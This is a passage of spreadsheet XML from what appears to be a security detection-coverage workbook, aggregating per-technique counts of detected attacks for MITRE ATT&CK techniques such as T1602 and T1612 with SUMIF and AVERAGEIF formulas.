        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB72" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>3</v>
      </c>
      <c r="BC72" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>16</v>
      </c>
      <c r="BD72" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>8</v>
      </c>
      <c r="BE72" s="4" t="str">
        <f t="shared" si="23"/>
        <v>8 (16)</v>
      </c>
      <c r="BF72" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>6</v>
      </c>
      <c r="BG72" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH72" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>3</v>
      </c>
      <c r="BI72" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>2</v>
      </c>
      <c r="BJ72" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>2</v>
      </c>
      <c r="BK72" s="322" t="str">
        <f t="shared" si="24"/>
        <v>2 (2)</v>
      </c>
      <c r="BL72" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM72" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN72" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>2</v>
      </c>
      <c r="BO72" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>11</v>
      </c>
      <c r="BP72" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>11</v>
      </c>
      <c r="BQ72" s="4" t="str">
        <f t="shared" si="25"/>
        <v>11 (11)</v>
      </c>
      <c r="BR72" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS72" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>5</v>
      </c>
      <c r="BT72" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU72" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>6</v>
      </c>
      <c r="BV72" s="292">
        <v>3</v>
      </c>
      <c r="BW72" s="322">
        <v>3</v>
      </c>
      <c r="BX72" s="4" t="str">
        <f t="shared" si="26"/>
        <v>3 (3)</v>
      </c>
      <c r="BY72" s="12">
        <v>1</v>
      </c>
      <c r="BZ72" s="13">
        <v>1</v>
      </c>
      <c r="CA72" s="394">
        <v>3</v>
      </c>
      <c r="CB72" s="288">
        <v>6</v>
      </c>
      <c r="CC72" s="4">
        <v>6</v>
      </c>
      <c r="CD72" s="4" t="str">
        <f t="shared" si="27"/>
        <v>6 (6)</v>
      </c>
      <c r="CE72" s="4">
        <v>1</v>
      </c>
      <c r="CF72" s="4">
        <v>1</v>
      </c>
      <c r="CG72" s="13">
        <v>1</v>
      </c>
      <c r="CH72" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="73" spans="1:98" ht="15" customHeight="1">
      <c r="A73" s="4">
        <f t="shared" si="28"/>
        <v>71</v>
      </c>
      <c r="B73" s="4" t="str">
        <f>IFERROR(VLOOKUP(A73,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1602</v>
      </c>
      <c r="C73" s="4" t="str">
        <f>IFERROR(VLOOKUP(B73,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data from Configuration Repository</v>
      </c>
      <c r="D73" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B73)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E73" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F73" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (2)</v>
      </c>
      <c r="G73" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>0</v>
      </c>
      <c r="H73" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>0</v>
      </c>
      <c r="I73" s="322" t="str">
        <f t="shared" si="15"/>
        <v>0 (0)</v>
      </c>
      <c r="J73" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>0</v>
      </c>
      <c r="K73" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0</v>
      </c>
      <c r="L73" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>0</v>
      </c>
      <c r="M73" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>396</v>
      </c>
      <c r="N73" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>1</v>
      </c>
      <c r="O73" s="322" t="str">
        <f t="shared" si="16"/>
        <v>1 (396)</v>
      </c>
      <c r="P73" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>1</v>
      </c>
      <c r="Q73" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R73" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>1</v>
      </c>
      <c r="S73" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>396</v>
      </c>
      <c r="T73" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>1</v>
      </c>
      <c r="U73" s="4" t="str">
        <f t="shared" si="17"/>
        <v>1 (396)</v>
      </c>
      <c r="V73" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W73" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X73" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y73" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>792</v>
      </c>
      <c r="Z73" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>2</v>
      </c>
      <c r="AA73" s="322" t="str">
        <f t="shared" si="18"/>
        <v>2 (792)</v>
      </c>
      <c r="AB73" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC73" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD73" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE73" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>796</v>
      </c>
      <c r="AF73" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>4</v>
      </c>
      <c r="AG73" s="322" t="str">
        <f t="shared" si="19"/>
        <v>4 (796)</v>
      </c>
      <c r="AH73" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>4</v>
      </c>
      <c r="AI73" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ73" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK73" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>1588</v>
      </c>
      <c r="AL73" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>6</v>
      </c>
      <c r="AM73" s="322" t="str">
        <f t="shared" si="20"/>
        <v>6 (1588)</v>
      </c>
      <c r="AN73" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>6</v>
      </c>
      <c r="AO73" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP73" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>1</v>
      </c>
      <c r="AQ73" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR73" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS73" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT73" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU73" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV73" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW73" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>792</v>
      </c>
      <c r="AX73" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>2</v>
      </c>
      <c r="AY73" s="322" t="str">
        <f t="shared" si="22"/>
        <v>2 (792)</v>
      </c>
      <c r="AZ73" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>2</v>
      </c>
      <c r="BA73" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB73" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC73" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>1188</v>
      </c>
      <c r="BD73" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>3</v>
      </c>
      <c r="BE73" s="4" t="str">
        <f t="shared" si="23"/>
        <v>3 (1188)</v>
      </c>
      <c r="BF73" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>3</v>
      </c>
      <c r="BG73" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH73" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>1</v>
      </c>
      <c r="BI73" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ73" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK73" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL73" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM73" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN73" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO73" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>3</v>
      </c>
      <c r="BP73" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>3</v>
      </c>
      <c r="BQ73" s="4" t="str">
        <f t="shared" si="25"/>
        <v>3 (3)</v>
      </c>
      <c r="BR73" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS73" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>3</v>
      </c>
      <c r="BT73" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU73" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>1</v>
      </c>
      <c r="BV73" s="292">
        <v>1</v>
      </c>
      <c r="BW73" s="322">
        <v>1</v>
      </c>
      <c r="BX73" s="4" t="str">
        <f t="shared" si="26"/>
        <v>1 (1)</v>
      </c>
      <c r="BY73" s="12">
        <v>1</v>
      </c>
      <c r="BZ73" s="13">
        <v>1</v>
      </c>
      <c r="CA73" s="394">
        <v>1</v>
      </c>
      <c r="CB73" s="288">
        <v>2</v>
      </c>
      <c r="CC73" s="4">
        <v>2</v>
      </c>
      <c r="CD73" s="4" t="str">
        <f t="shared" si="27"/>
        <v>2 (2)</v>
      </c>
      <c r="CE73" s="4">
        <v>1</v>
      </c>
      <c r="CF73" s="4">
        <v>1</v>
      </c>
      <c r="CG73" s="13">
        <v>1</v>
      </c>
      <c r="CH73" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="74" spans="1:98" ht="15" customHeight="1">
      <c r="A74" s="4">
        <f t="shared" si="28"/>
        <v>72</v>
      </c>
      <c r="B74" s="4" t="str">
        <f>IFERROR(VLOOKUP(A74,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1612</v>
      </c>
      <c r="C74" s="4" t="str">
        <f>IFERROR(VLOOKUP(B74,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Build Image on Host</v>
      </c>
      <c r="D74" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B74)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E74" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>188</v>
      </c>
      <c r="F74" s="286" t="str">
        <f t="shared" si="29"/>
        <v>2 (188)</v>
      </c>
      <c r="G74" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>114</v>
      </c>
      <c r="H74" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>65</v>
      </c>
      <c r="I74" s="322" t="str">
        <f t="shared" si="15"/>
        <v>65 (114)</v>
      </c>
      <c r="J74" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>7</v>
      </c>
      <c r="K74" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L74" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>23</v>
      </c>
      <c r="M74" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>159</v>
      </c>
      <c r="N74" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>12</v>
      </c>
      <c r="O74" s="322" t="str">
        <f t="shared" si="16"/>
        <v>12 (159)</v>
      </c>
      <c r="P74" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>3</v>
      </c>
      <c r="Q74" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R74" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>12</v>
      </c>
      <c r="S74" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>273</v>
      </c>
      <c r="T74" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>77</v>
      </c>
      <c r="U74" s="4" t="str">
        <f t="shared" si="17"/>
        <v>77 (273)</v>
      </c>
      <c r="V74" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>10</v>
      </c>
      <c r="W74" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X74" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>34</v>
      </c>
      <c r="Y74" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>127</v>
      </c>
      <c r="Z74" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>78</v>
      </c>
      <c r="AA74" s="322" t="str">
        <f t="shared" si="18"/>
        <v>78 (127)</v>
      </c>
      <c r="AB74" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>10</v>
      </c>
      <c r="AC74" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD74" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>35</v>
      </c>
      <c r="AE74" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>309</v>
      </c>
      <c r="AF74" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>97</v>
      </c>
      <c r="AG74" s="322" t="str">
        <f t="shared" si="19"/>
        <v>97 (309)</v>
      </c>
      <c r="AH74" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>11</v>
      </c>
      <c r="AI74" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ74" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>83</v>
      </c>
      <c r="AK74" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>436</v>
      </c>
      <c r="AL74" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>175</v>
      </c>
      <c r="AM74" s="322" t="str">
        <f t="shared" si="20"/>
        <v>175 (436)</v>
      </c>
      <c r="AN74" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>22</v>
      </c>
      <c r="AO74" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP74" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>109</v>
      </c>
      <c r="AQ74" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR74" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS74" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT74" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU74" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV74" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B74,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW74" s="392">
